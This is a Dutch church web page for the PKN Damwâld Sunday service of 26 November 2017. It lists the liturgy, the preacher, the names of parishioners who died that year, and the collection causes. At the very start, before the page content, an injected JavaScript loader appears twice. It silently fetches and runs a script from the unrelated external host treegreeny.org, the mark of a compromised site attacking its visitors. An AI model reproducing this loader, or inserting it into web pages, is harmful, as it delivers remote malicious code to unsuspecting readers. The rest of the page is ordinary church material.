;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 26 november 2017 9:30 uur - PKN Damwâld
zondag 26 november 2017
09:30 uur

Kerkdienst zondag 26 november 2017 9:30 uur

Thema: Laatste zondag van het Kerkelijk jaar

Informatie

Voorganger:Ds. M.J. Koppe, Dokkum
Organist:Ivo van Hijum
Thema:Laatste zondag van het Kerkelijk jaar
Liturgie
Lied voor de dienst : ElB 209 : 1,2 en 3
Welkom en mededelingen
intochtslied : ps 65 : 1 en 2
Stil gebed /votum en groet
Gebed van verootmoediging
We zingen: ps 32 : 1 en 2
We lezen: Openb.Joh.14 : 12 en 13
We zingen: ElB 396 : 1,2 en 3
Gebed om de Heilige Geest
We lezen: Nehemia 2 : 1-15
We zingen: ps 122 : 1,2 en 3
Verkondiging .
We zingen: ps 42 : 1,5 en 7
Noemen namen van de gestorvenen en aansteken van de kaarsen
Fokke van der Meulen, overleden op 20 december 2016, 83 jaar
Baukje Braaksma, overleden op 27 december 2016, 64 jaar
Sijke Venema-Grijpstra, overleden op 30 december 2016, 88 jaar
Wiebe van Meekeren, overleden op 5 februari 2017, 67 jaar
Johanna Wiersma – Kooistra, overleden op 9 april 2017, 95 jaar
Jan Sijtsma, overleden op 28 april 2017, 73 jaar
Antje van der Galiën-Bos, overleden op 1 mei 2017, 70 jaar
Tjeerd Riemersma, overleden op 27 mei 2017, 77 jaar
Geertje Veldema-Turkstra, overleden op 22 juni 2017, 88 jaar
Rika de Jong-Rintjema, overleden op 5 juli 2017, 93 jaar
Jelske Hoekstra-Woelinga, overleden op 12 september 2017, 91 jaar
Æbeltje van der Molen – Bosch, overleden op 17 september 2017, 81 jaar
Anna van Kammen, overleden op 30 oktober 2017, 89 jaar
Pieter Bosch, overleden op 12 november 2017, 92 jaar
Dankzegging en voorbeden
Collecte
slotlied : J.de Heer 232 : 1,2,3 en 4
Zegen
na de dienst is er koffiedrinken voor genodigden in het Skûlplak
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: St. Mensenkinderen

Geen werk, geen inkomen, stijgende voedsel- en energieprijzen drijven veel straatarme gezinnen in Albanië, Armenië, Bulgarije en Moldavië tot wanhoop. En binnenkort wordt het weer winter; een angstige en onzekere tijd. Want winter betekent: extreme kou, honger lijden en hopen dat niemand ziek wordt. De winter is daarom een grote vijand; elk jaar sterven tientallen mensen van honger en kou. De bange vraag die arme gezinnen telkens weer stellen is of ze de wintermaanden kunnen overleven: 'Zullen we voldoende eten hebben om de winter door te komen?' Zij voelen zich volledig afhankelijk, van God en van mensen die hulp bieden. Mensenkinderen trekt zich het lot van deze arme medemensen aan. Met hulp van lokale (kerkelijke) vrijwilligers geven we hen vier maanden lang een uitgebreid voedselpakket. Op deze manier helpen we ze de winter door.

Tweede collecte: Kerk
Uitganscollecte: Kerk